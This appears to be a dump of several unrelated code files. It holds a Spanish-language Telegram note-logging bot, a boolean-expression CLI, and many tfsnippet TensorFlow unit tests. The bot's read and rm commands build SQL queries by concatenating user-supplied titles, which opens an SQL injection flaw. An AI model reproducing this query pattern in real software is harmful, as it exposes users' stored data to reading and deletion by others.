```python
from telegram.ext import (Updater,CommandHandler,MessageHandler,Filters)
from models.msg_handler import (message_handler)
from models.database import (get_all_by_col,put_in_table, rem_from_table, get_cols_by_col)
import urllib
DB = "backlog.db"
TABLE_NAME = "backlog"
# logs command
def logs(update,ctx):
chat_id = update.message.chat_id
logs = get_cols_by_col(DB,TABLE_NAME,["title"],"chat_id = "+str(chat_id),"order by title asc")
if logs==False:
ctx.bot.send_message(chat_id,"<b> Todavia no hay logs</b>",parse_mode="HTML")
else:
r = "<b>Logs existentes: </b>\n\n"
for i in logs:
r += "* " + i[0] + "\n"
ctx.bot.send_message(chat_id,r,parse_mode="HTML")
# read command
def read(update,ctx):
chat_id = update.message.chat_id
title = update.message.text.split(' ')
if len(title)!=2:
ctx.bot.send_message(chat_id,"El titulo no es valido, no debe tener espacios")
else :
title = title[1]
r = get_cols_by_col(DB,TABLE_NAME,['description'],"title = '" + title + "' AND chat_id = " + str(chat_id))
if r == False:
ctx.bot.send_message(chat_id,"<b>No se ha encontrado ningun log</b>",parse_mode="HTML")
elif len(r) == 1:
ctx.bot.send_message(chat_id,"<b>" + title + "</b>\n\n"+r[0][0],parse_mode="HTML")
else:
for i in range(0,len(r)):
ctx.bot.send_message(chat_id,"<b>" + title + "(" + str(i) + ")</b>\n\n"+ r[i][0],parse_mode="HTML")
# rm command
def rm(update,ctx):
chat_id = update.message.chat_id
title = update.message.text.split(' ')
if len(title)!=2:
ctx.bot.send_message(chat_id,"El titulo no es valido, no debe tener espacios")
else :
title = title[1]
r = get_all_by_col(DB,TABLE_NAME,"title = '" + title + "' AND chat_id = " + str(chat_id))
if len(r) == 0:
ctx.bot.send_message(chat_id,"El log " + title + " no existe")
else:
rem_from_table(DB,TABLE_NAME,"title = '"+title+"' AND chat_id = " + str(chat_id))
ctx.bot.send_message(chat_id,"El log " + title + " ha sido eliminado, /logs para ver los guardados")
# help command
def help(update,ctx):
ctx.bot.send_message( update.message.chat_id,("""<b>Comandos de backlog</b>\n<b>* help: </b>muestra este mensage\n<b>* hello: </b>te manda un saludo\n<b>* logs: </b>puedes ver todos los logs guardados\n<b>* rm 'log_name':</b> sirve para eliminar un log existente\n<b>* read 'titulo': </b>leer la descripcion de los logs con ese titulo\n\n<b>nota:</b> para añadir un log basta con enviar un mensaje con dos lineas, la primera con la palabra titulo seguido de : y luego el titulo que quieres darle, en la siguiente linea pones la descripcion (ojo! todo en una sola linea o el bot no lo detectara, no escribas saltos de linea (maximo 4096 caracteres el mensaje entero)"""),
parse_mode="HTML")
# hello command
def hello(update,ctx):
ctx.bot.send_message(update.message.chat_id,"Hi")
# message handler
def msg(update, ctx):
r = message_handler(update.message.text)
print(r)
if r:
put_in_table(DB,TABLE_NAME,['chat_id', 'title','description'],[update.message.chat_id,r[0],r[1]])
ctx.bot.send_message(update.message.chat_id,"<b> Log registrado con el nombre: " + r[0] + " </b>",parse_mode="HTML")
def main():
# get token
try:
f = open("tok",'r')
except Exception as ex:
print("error opening tok file: ",ex)
exit(-1)
token = f.readline()
token = token[0:len(token)-1]
f.close()
# make the bot run
updater = Updater(token,use_context = True)
bot = updater.dispatcher
bot.add_handler(CommandHandler('hello',hello))
bot.add_handler(CommandHandler('logs',logs))
bot.add_handler(CommandHandler('help',help))
bot.add_handler(CommandHandler('read',read))
bot.add_handler(CommandHandler('rm',rm))
bot.add_handler(MessageHandler(Filters.text,callback=msg))
updater.start_polling()
updater.idle()
if __name__ == "__main__":
main()
``` |
{
"source": "89678yhub98r39sf/expresso",
"score": 3
} |
#### File: 89678yhub98r39sf/expresso/interface.py
```python
from expr_tree import *
def whilus_loopus():
while True:
q = input("Input your boolean string:\t")
e = ExprTree(q)
e.process()
if e.parsedEas == False:
print("Invalid string")
continue
while True:
c = input("Want Possible decisions? pd\t")
if c.lower() != "pd":
print("you want no decide then. bye.\n" * 100)
print("\n\n")
break
for k, v in e.possibleDecisions.items():
print("number {}\n{}\n".format(k, ExprTree.traversal_display(v, "partial")))
q = None
while True:
try:
q = int(input("* select the decision by number\n* of your interest, and you will receive choices:\t"))
break
except:
print("invalid number {}".format(q))
if q == None or q not in e.possibleDecisions:
print("invalid number {}".format(q))
continue
q = e.possibleDecisions[q]
q2 = ExprTree.decision_to_choice(q)
print("* Choice is :\n{}\n".format(ExprTree.traversal_display(q2)))
def main():
print("iqop program parses input boolean expression string")
whilus_loopus()
if __name__ == "__main__":
main()
``` |
{
"source": "897615138/tfsnippet-jill",
"score": 3
} |
#### File: tests/datasets/test_fashion_mnist.py
```python
import unittest
import numpy as np
import pytest
from tests.datasets.helper import skipUnlessRunDatasetsTests
from tfsnippet.datasets import *
class FashionMnistTestCase(unittest.TestCase):
@skipUnlessRunDatasetsTests()
def test_fetch_fashion_mnist(self):
# test normalize_x = False
(train_x, train_y), (test_x, test_y) = load_fashion_mnist()
self.assertTupleEqual(train_x.shape, (60000, 28, 28))
self.assertTupleEqual(train_y.shape, (60000,))
self.assertTupleEqual(test_x.shape, (10000, 28, 28))
self.assertTupleEqual(test_y.shape, (10000,))
self.assertGreater(np.max(train_x), 128.)
# test normalize_x = True
(train_x, train_y), (test_x, test_y) = \
load_fashion_mnist(normalize_x=True)
self.assertTupleEqual(train_x.shape, (60000, 28, 28))
self.assertTupleEqual(train_y.shape, (60000,))
self.assertTupleEqual(test_x.shape, (10000, 28, 28))
self.assertTupleEqual(test_y.shape, (10000,))
self.assertLess(np.max(train_x), 1. + 1e-5)
# test x_shape
(train_x, train_y), (test_x, test_y) = \
load_fashion_mnist(x_shape=(784,))
self.assertTupleEqual(train_x.shape, (60000, 784))
self.assertTupleEqual(test_x.shape, (10000, 784))
with pytest.raises(ValueError,
match='`x_shape` does not product to 784'):
_ = load_mnist(x_shape=(1, 2, 3))
```
#### File: tests/distributions/test_base.py
```python
import numpy as np
import tensorflow as tf
from tfsnippet.distributions import Distribution, reduce_group_ndims
class DistributionTestCase(tf.test.TestCase):
def test_basic(self):
class _Distribution(Distribution):
def log_prob(self, given, group_ndims=0, name=None):
return reduce_group_ndims(
tf.reduce_sum,
tf.convert_to_tensor(given) - 1.,
group_ndims
)
with self.test_session() as sess:
distrib = _Distribution(
dtype=tf.float32,
is_reparameterized=True,
is_continuous=True,
batch_shape=tf.constant([]),
batch_static_shape=tf.TensorShape([]),
value_ndims=0,
)
self.assertIs(distrib.base_distribution, distrib)
x = np.asarray([0., 1., 2.])
np.testing.assert_allclose(
sess.run(distrib.prob(x, group_ndims=0)),
np.exp(x - 1.)
)
np.testing.assert_allclose(
sess.run(distrib.prob(x, group_ndims=1)),
np.exp(np.sum(x - 1., -1))
)
```
#### File: tests/distributions/test_mixture.py
```python
import numpy as np
import pytest
import tensorflow as tf
from mock import Mock
from tfsnippet import Categorical, Normal, Mixture, OnehotCategorical
from tfsnippet.utils import set_random_seed
class MixtureTestCase(tf.test.TestCase):
def test_errors(self):
with pytest.raises(TypeError,
match='`categorical` must be a Categorical '
'distribution'):
_ = Mixture(Normal(0., 0.), [Normal(0., 0.)])
with pytest.raises(ValueError,
match='Dynamic `categorical.n_categories` is not '
'supported'):
_ = Mixture(Categorical(logits=tf.placeholder(tf.float32, [None])),
[Normal(0., 0.)])
with pytest.raises(ValueError, match='`components` must not be empty'):
_ = Mixture(Categorical(logits=tf.zeros([5])), [])
with pytest.raises(ValueError,
match=r'`len\(components\)` != `categorical.'
r'n_categories`: 1 vs 5'):
_ = Mixture(Categorical(logits=tf.zeros([5])), [Normal(0., 0.)])
with pytest.raises(ValueError,
match='`dtype` of the 1-th component does not '
'agree with the first component'):
_ = Mixture(Categorical(logits=tf.zeros([2])),
[Categorical(tf.zeros([2, 3]), dtype=tf.int32),
Categorical(tf.zeros([2, 3]), dtype=tf.float32)])
with pytest.raises(ValueError,
match='`value_ndims` of the 1-th component does not '
'agree with the first component'):
_ = Mixture(Categorical(logits=tf.zeros([2])),
[Categorical(tf.zeros([2, 3])),
OnehotCategorical(tf.zeros([2, 3]))])
with pytest.raises(ValueError,
match='`is_continuous` of the 1-th component does '
'not agree with the first component'):
_ = Mixture(Categorical(logits=tf.zeros([2])),
[Categorical(tf.zeros([2, 3]), dtype=tf.float32),
Normal(tf.zeros([2]), tf.zeros([2]))])
with pytest.raises(ValueError,
match='the 0-th component is not re-parameterized'):
_ = Mixture(Categorical(logits=tf.zeros([2])),
[Categorical(tf.zeros([2, 3]), dtype=tf.float32),
Normal(tf.zeros([2]), tf.zeros([2]))],
is_reparameterized=True)
with pytest.raises(RuntimeError,
match='.* is not re-parameterized'):
m = Mixture(
Categorical(logits=tf.zeros([2])),
[Normal(-1., 0.), Normal(1., 0.)]
)
_ = m.sample(1, is_reparameterized=True)
with pytest.raises(ValueError,
match='Batch shape of `categorical` does not '
'agree with the first component'):
_ = Mixture(
Categorical(logits=tf.zeros([1, 3, 2])),
[Normal(mean=tf.zeros([3]), logstd=0.),
Normal(mean=tf.zeros([3]), logstd=0.)]
)
with pytest.raises(ValueError,
match='Batch shape of the 1-th component does not '
'agree with the first component'):
_ = Mixture(
Categorical(logits=tf.zeros([3, 2])),
[Normal(mean=tf.zeros([3]), logstd=0.),
Normal(mean=tf.zeros([4]), logstd=0.)]
)
def do_check_mixture(self, component_factory, value_ndims, batch_shape,
is_continuous, dtype, logits_dtype,
is_reparameterized):
def make_distributions(n_samples, compute_density=False):
logits = np.random.normal(size=batch_shape + [3])
logits = logits.astype(logits_dtype)
categorical = Categorical(logits=logits)
components = [
component_factory(), component_factory(), component_factory()
]
cat_sample = categorical.sample(
n_samples, compute_density=compute_density)
c_samples = [c.sample(n_samples, compute_density=compute_density)
for c in components]
categorical.sample = Mock(return_value=cat_sample)
for c, c_sample in zip(components, c_samples):
c.sample = Mock(return_value=c_sample)
return categorical, components, cat_sample, c_samples
def check_sampling():
t = mixture.sample(n_samples)
out = sess.run([t, cat_sample] + list(c_samples))
m_sample, cat = out[:2]
component_samples = out[2:]
samples_stack = np.stack(component_samples, axis=-value_ndims - 1)
mask = np.eye(mixture.n_components, mixture.n_components)[cat]
mask = np.reshape(mask, mask.shape + (1,) * value_ndims)
ans = np.sum(mask * samples_stack, axis=-value_ndims - 1)
np.testing.assert_allclose(m_sample, ans)
def log_sum_exp(x, axis, keepdims=False):
x_max = np.max(x, axis=axis, keepdims=True)
ret = x_max + np.log(
np.sum(np.exp(x - x_max), axis=axis, keepdims=True))
if not keepdims:
ret = np.squeeze(ret, axis=axis)
return ret
def get_log_prob(t, group_ndims=0):
cat_log_probs = [
np.reshape(x, x.shape[:-1])
for x in np.split(
sess.run(tf.nn.log_softmax(categorical.logits)),
mixture.n_components,
axis=-1
)
]
c_log_probs = sess.run([c.log_prob(t) for c in components])
log_prob = log_sum_exp(
np.stack(
[cat + c for cat, c in zip(cat_log_probs, c_log_probs)],
axis=0
),
axis=0
)
if group_ndims > 0:
log_prob = np.sum(
log_prob,
axis=tuple(range(-group_ndims, 0))
)
return log_prob
def check_prob(group_ndims):
t = mixture.sample(n_samples)
t, log_prob, prob = sess.run([
t,
t.log_prob(group_ndims=group_ndims),
t.prob(group_ndims=group_ndims)
])
np.testing.assert_allclose(
get_log_prob(t, group_ndims), log_prob,
rtol=1e-5, atol=1e-6
)
np.testing.assert_allclose(
np.exp(get_log_prob(t, group_ndims)), prob,
rtol=1e-5, atol=1e-6
)
def check_sample_group_ndims(group_ndims, compute_density=None):
t = mixture.sample(n_samples, group_ndims=group_ndims,
compute_density=compute_density)
t, log_prob, prob = sess.run([t, t.log_prob(), t.prob()])
np.testing.assert_allclose(
get_log_prob(t, group_ndims), log_prob,
rtol=1e-5, atol=1e-6
)
np.testing.assert_allclose(
np.exp(get_log_prob(t, group_ndims)), prob,
rtol=1e-5, atol=1e-6
)
set_random_seed(1234)
with self.test_session() as sess:
n_samples = 11
categorical, components, cat_sample, c_samples = \
make_distributions(n_samples)
mixture = Mixture(categorical, components,
is_reparameterized=is_reparameterized)
self.assertIs(mixture.categorical, categorical)
self.assertTupleEqual(mixture.components, tuple(components))
self.assertEqual(mixture.n_components, 3)
self.assertEqual(mixture.dtype, dtype)
self.assertEqual(mixture.is_continuous, is_continuous)
self.assertEqual(mixture.is_reparameterized, is_reparameterized)
self.assertEqual(mixture.value_ndims, value_ndims)
check_sampling()
check_prob(0)
check_prob(1)
check_sample_group_ndims(0)
check_sample_group_ndims(1)
check_sample_group_ndims(0, compute_density=False)
check_sample_group_ndims(1, compute_density=False)
check_sample_group_ndims(0, compute_density=True)
check_sample_group_ndims(1, compute_density=True)
def test_value_ndims_0(self):
self.do_check_mixture(
lambda: Normal(
mean=np.random.normal(size=[4, 5]).astype(np.float64),
logstd=np.random.normal(size=[4, 5]).astype(np.float64)
),
value_ndims=0,
batch_shape=[4, 5],
is_continuous=True,
dtype=tf.float64,
logits_dtype=np.float64,
is_reparameterized=True
)
def test_value_ndims_1(self):
self.do_check_mixture(
lambda: OnehotCategorical(
logits=np.random.normal(size=[4, 5, 7]).astype(np.float32),
dtype=tf.int32
),
value_ndims=1,
batch_shape=[4, 5],
is_continuous=False,
dtype=tf.int32,
logits_dtype=np.float32,
is_reparameterized=False
)
```
#### File: tests/distributions/test_utils.py
```python
import pytest
import six
import numpy as np
import tensorflow as tf
from tfsnippet.distributions import reduce_group_ndims
if six.PY2:
LONG_MAX = long(1) << 63 - long(1)
else:
LONG_MAX = 1 << 63 - 1
class ReduceGroupNdimsTestCase(tf.test.TestCase):
def test_errors(self):
for o in [object(), None, 1.2, LONG_MAX,
tf.constant(1.2, dtype=tf.float32),
tf.constant(LONG_MAX, dtype=tf.int64)]:
with pytest.raises(
TypeError,
match='group_ndims cannot be converted to int32'):
_ = reduce_group_ndims(tf.reduce_sum, tf.constant(0.), o)
with pytest.raises(
ValueError, match='group_ndims must be non-negative'):
_ = reduce_group_ndims(tf.reduce_sum, tf.constant(0.), -1)
with self.test_session():
with pytest.raises(
Exception, match='group_ndims must be non-negative'):
_ = reduce_group_ndims(tf.reduce_sum, tf.constant(0.),
tf.constant(-1, dtype=tf.int32)).eval()
def test_output(self):
tensor = tf.reshape(tf.range(24, dtype=tf.float32), [2, 3, 4])
tensor_sum_1 = tf.reduce_sum(tensor, axis=-1)
tensor_sum_2 = tf.reduce_sum(tensor, axis=[-2, -1])
tensor_prod = tf.reduce_prod(tensor, axis=-1)
g0 = tf.constant(0, dtype=tf.int32)
g1 = tf.constant(1, dtype=tf.int32)
g2 = tf.constant(2, dtype=tf.int32)
with self.test_session():
# static group_ndims
np.testing.assert_equal(
tensor.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, 0).eval()
)
np.testing.assert_equal(
tensor_sum_1.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, 1).eval()
)
np.testing.assert_equal(
tensor_sum_2.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, 2).eval()
)
np.testing.assert_equal(
tensor_prod.eval(),
reduce_group_ndims(tf.reduce_prod, tensor, 1).eval()
)
# dynamic group_ndims
np.testing.assert_equal(
tensor.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, g0).eval()
)
np.testing.assert_equal(
tensor_sum_1.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, g1).eval()
)
np.testing.assert_equal(
tensor_sum_2.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, g2).eval()
)
np.testing.assert_equal(
tensor_prod.eval(),
reduce_group_ndims(tf.reduce_prod, tensor, g1).eval()
)
```
#### File: tests/examples/test_examples.py
```python
import codecs
import copy
import os
import re
import subprocess
import sys
import time
import unittest
from tfsnippet.utils import TemporaryDirectory, humanize_duration
from tests.examples.helper import skipUnlessRunExamplesTests
class ExamplesTestCase(unittest.TestCase):
"""
Test case to ensure all examples can run for at least one step.
"""
@skipUnlessRunExamplesTests()
def test_examples_can_run_one_step(self):
timer = -time.time()
# discover all example scripts
def walk(pa, dst):
for fn in os.listdir(pa):
fp = os.path.join(pa, fn)
if os.path.isdir(fp):
walk(fp, dst)
elif fp.endswith('.py'):
with codecs.open(fp, 'rb', 'utf-8') as f:
cnt = f.read()
if re.search(
r'''if\s+__name__\s*==\s+(['"])__main__\1:''',
cnt):
if 'max_step=config.max_step' not in cnt:
raise RuntimeError('Example script does not have '
'max_step configuration: {}'.
format(fp))
dst.append(fp)
return dst
examples_dir = os.path.join(
os.path.split(os.path.abspath(__file__))[0],
'../../tfsnippet/examples'
)
examples_scripts = walk(examples_dir, [])
# run all examples scripts for just max_step
env_dict = copy.copy(os.environ)
for example_script in examples_scripts:
print('Run {} ...'.format(example_script))
with TemporaryDirectory() as tempdir:
args = [sys.executable, '-u',
example_script, '--max_step=1']
subprocess.check_call(args, cwd=tempdir, env=env_dict)
print('')
# report finished tests
print('Finished to run {} example scripts in {}.'.format(
len(examples_scripts), humanize_duration(time.time() + timer)))
```
#### File: tfsnippet-jill/tests/helper.py
```python
import tensorflow as tf
__all__ = ['assert_variables']
def assert_variables(names, exist=True, trainable=None, scope=None,
collections=None):
"""
Assert variables of `name_or_names` meet certain criterion.
Args:
names (Iterable[str]): Name, or names.
exist (bool): Assert variables exist or not.
trainable: Assert variables are trainable or not.
scope (None or str): The scope prefix to be prepended to the names.
collections (Iterable[str]): Additional graph collections, where
to ensure the variables are in.
"""
def normalize_name(n):
return n.rsplit(':', 1)[0]
names = tuple(names)
if scope:
scope = str(scope).rstrip('/')
names = tuple('{}/{}'.format(scope, name) for name in names)
global_vars = {normalize_name(v.name): v
for v in tf.global_variables()}
trainable_vars = {normalize_name(v.name): v
for v in tf.trainable_variables()}
collections = list(collections or ())
collection_vars = [
{normalize_name(v.name): v for v in tf.get_collection(c)}
for c in collections
]
for name in names:
if exist:
if name not in global_vars:
raise AssertionError('Variable `{}` is expected to exist, but '
'turn out to be non-exist.'.format(name))
# check trainable
if trainable is False:
if name in trainable_vars:
raise AssertionError('Variable `{}` is expected not to be '
'trainable, but turned out to be '
'trainable'.format(name))
elif trainable is True:
if name not in trainable_vars:
raise AssertionError('Variable `{}` is expected to be '
'trainable, but turned out not to be '
'trainable'.format(name))
# check collections
for coll, coll_vars in zip(collections, collection_vars):
if name not in coll_vars:
raise AssertionError('Variable `{}` is expected to be '
'in the collection `{}`, but turned '
'out not.'.format(name, coll))
else:
if name in global_vars:
raise AssertionError('Variable `{}` is expected not to exist, '
'but turn out to be exist.'.format(name))
```
#### File: layers/core/test_dense.py
```python
import numpy as np
import tensorflow as tf
from tests.helper import assert_variables
from tests.layers.helper import l2_normalize
from tests.layers.core.test_gated import safe_sigmoid
from tfsnippet.layers import dense
from tfsnippet.utils import get_static_shape
class DenseTestCase(tf.test.TestCase):
def test_linear(self):
np.random.seed(1234)
kernel = np.random.normal(size=(5, 3)).astype(np.float64)
bias = np.random.normal(size=(3,)).astype(np.float64)
x = np.random.normal(size=(11, 7, 5)).astype(np.float64)
with self.test_session() as sess:
# test 2d input
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x[0]), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias)
)
),
np.dot(x[0], kernel) + bias,
rtol=1e-5
)
# test 3d input
ans = np.dot(x, kernel) + bias
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias)
)
),
ans,
rtol=1e-5
)
# test dynamic batch and sampling size
ph = tf.placeholder(dtype=tf.float64, shape=(None, None, 5))
np.testing.assert_allclose(
sess.run(
dense(
ph, 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias)
),
feed_dict={ph: x}
),
ans,
rtol=1e-5
)
# test use_bias is False
ans = np.dot(x, kernel)
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias),
use_bias=False
)
),
ans,
rtol=1e-5
)
# test create variables
with tf.Graph().as_default():
_ = dense(tf.constant(x, dtype=tf.float64), 3)
assert_variables(['kernel', 'bias'], trainable=True, scope='dense',
collections=[tf.GraphKeys.MODEL_VARIABLES])
kernel_var = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)[-2]
bias_var = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)[-1]
self.assertEqual(get_static_shape(kernel_var), kernel.shape)
self.assertEqual(get_static_shape(bias_var), bias.shape)
# test create variables, non-trainable
with tf.Graph().as_default():
_ = dense(tf.constant(x, dtype=tf.float64), 3, trainable=False)
assert_variables(['kernel', 'bias'], trainable=False, scope='dense',
collections=[tf.GraphKeys.MODEL_VARIABLES])
# test create variables, use_bias is False
with tf.Graph().as_default():
_ = dense(tf.constant(x, dtype=tf.float64), 3, use_bias=False)
assert_variables(['kernel'], trainable=True, scope='dense',
collections=[tf.GraphKeys.MODEL_VARIABLES])
assert_variables(['bias'], exist=False, scope='dense')
def test_normalization_and_activation(self):
np.random.seed(1234)
kernel = np.random.normal(size=(5, 3)).astype(np.float64)
bias = np.random.normal(size=(3,)).astype(np.float64)
x = np.random.normal(size=(11, 7, 5)).astype(np.float64)
normalizer_fn = lambda x: x * 2. + 1.
activation_fn = lambda x: x * 1.5 - 3.
self.assertGreater(
np.min(np.abs(normalizer_fn(activation_fn(x)) -
activation_fn(normalizer_fn(x)))),
1.
)
with self.test_session() as sess:
# test weight_norm + normalizer + activation
normalized_kernel = l2_normalize(kernel, axis=0)
ans = activation_fn(normalizer_fn(np.dot(x, normalized_kernel)))
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias),
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
weight_norm=True
)
),
ans,
rtol=1e-5
)
# test weight_norm + normalizer + activation, use_bias is True
ans = activation_fn(
normalizer_fn(np.dot(x, normalized_kernel) + bias))
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias),
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
weight_norm=True,
use_bias=True
)
),
ans,
rtol=1e-5
)
def test_gated(self):
np.random.seed(1234)
kernel = np.random.normal(size=(5, 6)).astype(np.float64)
bias = np.random.normal(size=(6,)).astype(np.float64)
x = np.random.normal(size=(11, 7, 5)).astype(np.float64)
normalizer_fn = lambda x: x * 2. + 1.
activation_fn = lambda x: x * 1.5 - 3.
self.assertGreater(
np.min(np.abs(normalizer_fn(activation_fn(x)) -
activation_fn(normalizer_fn(x)))),
1.
)
with self.test_session() as sess:
normalized_kernel = l2_normalize(kernel, axis=0)
output, gate = np.split(
normalizer_fn(np.dot(x, normalized_kernel)), 2, axis=-1)
ans = activation_fn(output) * safe_sigmoid(gate + 1.1)
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias),
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
weight_norm=True,
gated=True,
gate_sigmoid_bias=1.1
)
),
ans,
rtol=1e-5
)
```
#### File: layers/core/test_gated.py
```python
import copy
import numpy as np
import pytest
import tensorflow as tf
from tfsnippet.layers import as_gated
def safe_sigmoid(x):
return np.where(x < 0, np.exp(x) / (1. + np.exp(x)), 1. / (1. + np.exp(-x)))
class AsGatedHelper(object):
def __init__(self, main_ret, gate_ret):
self.main_args = None
self.gate_args = None
self.main_ret = main_ret
self.gate_ret = gate_ret
def __call__(self, *args, **kwargs):
scope = kwargs['scope']
if scope == 'main':
assert(self.main_args is None)
self.main_args = (args, copy.copy(kwargs))
return self.main_ret
elif scope == 'gate':
assert(self.gate_args is None)
self.gate_args = (args, copy.copy(kwargs))
return self.gate_ret
else:
raise RuntimeError()
class TestAsGated(tf.test.TestCase):
def test_as_gated(self):
main_ret = np.random.normal(size=[2, 3, 4]).astype(np.float32)
gate_ret = np.random.normal(size=[2, 3, 4]).astype(np.float32)
activation_fn = object()
# default_name infer failed
with pytest.raises(ValueError,
match='`default_name` cannot be inferred'):
g = as_gated(AsGatedHelper(main_ret, gate_ret))
with self.test_session() as sess:
# test infer default name
f = AsGatedHelper(main_ret, gate_ret)
f.__name__ = 'f'
g = as_gated(f)
g_ret = g(1, xyz=2, activation_fn=activation_fn)
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'gated_f/')
self.assertEqual(
f.main_args,
(
(1,),
{'xyz': 2, 'activation_fn': activation_fn, 'scope': 'main'}
)
)
self.assertEqual(
f.gate_args,
(
(1,),
{'xyz': 2, 'scope': 'gate'}
)
)
# test specify default name
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, sigmoid_bias=1., default_name='ff')
g_ret = g(1, xyz=2, activation_fn=activation_fn)
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 1.))
self.assertTrue(g_ret.name, 'gated_ff/')
self.assertEqual(
f.main_args,
(
(1,),
{'xyz': 2, 'activation_fn': activation_fn, 'scope': 'main'}
)
)
self.assertEqual(
f.gate_args,
(
(1,),
{'xyz': 2, 'scope': 'gate'}
)
)
# test using `name`
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, default_name='f')
g_ret = g(1, xyz=2, activation_fn=activation_fn, name='name')
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'name/')
# test using `scope`
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, default_name='f')
g_ret = g(1, xyz=2, activation_fn=activation_fn, scope='scope')
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'scope/')
```
#### File: layers/flows/test_rearrangement.py
```python
import numpy as np
import tensorflow as tf
from tests.helper import assert_variables
from tests.layers.flows.helper import invertible_flow_standard_check
from tfsnippet.layers import FeatureShufflingFlow
class FeatureShufflingFlowTestCase(tf.test.TestCase):
def test_feature_shuffling_flow(self):
np.random.seed(1234)
with self.test_session() as sess:
# axis = -1, value_ndims = 1
x = np.random.normal(size=[3, 4, 5, 6]).astype(np.float32)
x_ph = tf.placeholder(dtype=tf.float32, shape=[None, None, None, 6])
permutation = np.arange(6, dtype=np.int32)
np.random.shuffle(permutation)
y = x[..., permutation]
log_det = np.zeros([3, 4, 5]).astype(np.float32)
layer = FeatureShufflingFlow(axis=-1, value_ndims=1)
y_out, log_det_out = layer.transform(x_ph)
sess.run(tf.assign(layer._permutation, permutation))
y_out, log_det_out = sess.run(
[y_out, log_det_out], feed_dict={x_ph: x})
np.testing.assert_equal(y_out, y)
np.testing.assert_equal(log_det_out, log_det)
invertible_flow_standard_check(
self, layer, sess, x_ph, feed_dict={x_ph: x})
assert_variables(['permutation'], trainable=False,
scope='feature_shuffling_flow',
collections=[tf.GraphKeys.MODEL_VARIABLES])
# axis = -2, value_ndims = 3
x = np.random.normal(size=[3, 4, 5, 6]).astype(np.float32)
x_ph = tf.placeholder(dtype=tf.float32, shape=[None, None, 5, None])
permutation = np.arange(5, dtype=np.int32)
np.random.shuffle(permutation)
y = x[..., permutation, :]
log_det = np.zeros([3]).astype(np.float32)
layer = FeatureShufflingFlow(axis=-2, value_ndims=3)
y_out, log_det_out = layer.transform(x_ph)
sess.run(tf.assign(layer._permutation, permutation))
y_out, log_det_out = sess.run(
[y_out, log_det_out], feed_dict={x_ph: x})
np.testing.assert_equal(y_out, y)
np.testing.assert_equal(log_det_out, log_det)
invertible_flow_standard_check(
self, layer, sess, x_ph, feed_dict={x_ph: x})
```
#### File: tests/layers/test_initialization.py
```python
import tensorflow as tf
from tfsnippet.layers import *
class DefaultKernelInitializerTestCase(tf.test.TestCase):
def test_default_kernel_initializer(self):
i = default_kernel_initializer(weight_norm=True)
self.assertEqual(i.stddev, .05)
i = default_kernel_initializer(weight_norm=(lambda t: t))
self.assertEqual(i.stddev, .05)
i = default_kernel_initializer(weight_norm=False)
self.assertFalse(hasattr(i, 'stddev'))
i = default_kernel_initializer(weight_norm=None)
self.assertFalse(hasattr(i, 'stddev'))
```
#### File: tests/ops/test_evaluation.py
```python
import numpy as np
import tensorflow as tf
from tfsnippet.ops import bits_per_dimension
class BitsPerDimensionTestCase(tf.test.TestCase):
def test_bits_per_dimension(self):
with self.test_session() as sess:
log_p = np.random.normal(size=[2, 3, 4, 5])
np.testing.assert_allclose(
sess.run(bits_per_dimension(log_p, 1., scale=None)),
-log_p / np.log(2)
)
np.testing.assert_allclose(
sess.run(bits_per_dimension(log_p, 1024 * 3, scale=None)),
-log_p / (np.log(2) * 1024 * 3)
)
np.testing.assert_allclose(
sess.run(bits_per_dimension(log_p, 1., scale=256.)),
-(log_p - np.log(256)) / np.log(2)
)
np.testing.assert_allclose(
sess.run(bits_per_dimension(log_p, 1024 * 3, scale=256)),
-(log_p - np.log(256) * 1024 * 3) / (np.log(2) * 1024 * 3)
)
```
#### File: tests/ops/test_shape_utils.py
```python
import numpy as np
import pytest
import tensorflow as tf
from tfsnippet.ops import *
from tfsnippet.utils import get_static_shape
class PrependDimsTestCase(tf.test.TestCase):
def test_prepend_dims(self):
with pytest.raises(ValueError, match='`ndims` must be >= 0: got -1'):
_ = prepend_dims(tf.constant(0.), ndims=-1)
x = tf.zeros([2, 3])
self.assertIs(prepend_dims(x, ndims=0), x)
with self.test_session() as sess:
# test static shape
x = np.random.normal(size=[2, 3])
y = prepend_dims(x, ndims=1)
self.assertEqual(get_static_shape(y), (1, 2, 3))
